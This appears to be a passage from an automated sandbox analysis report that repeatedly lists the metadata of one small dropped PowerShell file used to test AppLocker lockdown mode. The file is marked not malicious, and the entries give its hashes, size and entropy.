                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
